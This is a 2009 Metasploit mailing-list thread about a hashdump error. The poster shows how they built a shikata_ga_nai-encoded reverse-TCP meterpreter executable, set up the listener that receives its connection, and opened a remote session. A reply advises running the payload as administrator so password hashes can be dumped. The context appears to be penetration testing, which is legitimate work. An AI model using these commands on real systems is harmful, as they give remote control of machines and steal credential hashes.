Metasploit mailing list archives

Problem with meterpreter, priv, hashdump, etc.


From: wullie19 at ntlworld.com (rogue)
Date: Sat, 18 Apr 2009 22:00:27 +0100

Hi there,

I know you said you started msfconsole as root but to dump the hashes the
meterpreter has to be running with the appropriate privileges. Try
right-clicking it and running it as administrator and see if that helps.

-rogue  

Hi all,

I have used msfpayload to create a .exe to connect back to me successfully
in the past, and find it to be a great tool.  However, today I seem to be
hitting the wall when I try to get a hashdump out of the remote system. 
Here's the scenario:

I should add, this is all done with a fresh local copy from the subversion
trunk, revision 6490, and with ~/.msf3 removed entirely and refreshed by a
new call to msfconsole before starting.

I created an executable with the following command:


./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R |
./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o rv_443.exe

I started msfconsole (as root) with an rc file:


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
exploit

My session started just fine:


resource> use exploit/multi/handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST x.x.x.x
LHOST => x.x.x.x
resource> set LPORT 443
LPORT => 443
resource> exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

On the remote system, I started the rv_443.exe and saw the connection back
to my msfconsole session:


[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (x.x.x.x:443 -> y.y.y.y:1210)

And, I was able to get info back from the remote system, as expected.


meterpreter > sysinfo
Computer: sanitized for the clients protection!
OS      : Windows XP (Build 2600, Service Pack 3).
meterpreter > ls

Listing: C:\DOKUME~1\someuser\LOKALE~1\Temp\FFC0EAB.tmp
=====================================================

Mode              Size     Type  Last modified                   Name
----              ----     ----  -------------                   ----
40777/rwxrwxrwx   0        dir   Wed Dec 31 19:00:00 -0500 1969  .
40777/rwxrwxrwx   0        dir   Wed Dec 31 19:00:00 -0500 1969  ..
etc.
etc.
etc.

However, when I tried to use priv and then execute hashdump, or any other
command thereafter, I got errors.  I got no errors with 'ls' just after
'use priv', but I did get errors with 'ls' after 'hashdump'.


meterpreter > hashdump
[-] Error running command hashdump: wrong number of arguments (0 for 1)
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `initialize'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `exception'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `raise'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `send_request'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/extensions/priv/priv.rb:44:in `sam_hashes'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb:39:in `cmd_hashdump'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb:123:in `call'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb:123:in `run'
/home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
/home/wdawson/Software/metasploit/framework3/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/interactive.rb:48:in `interact'
/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/command_dispatcher/core.rb:997:in `cmd_sessions'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:190:in `load_resource'
/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:185:in `each_line'
/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:185:in `load_resource'
/home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:103:in `initialize'
./msfconsole:82:in `new'
./msfconsole:82

Would this be at all due to the fact that the remote system is (seemingly)
using a German locale, or is it due to some other factor?

Thanks in advance for any suggestions or insight.


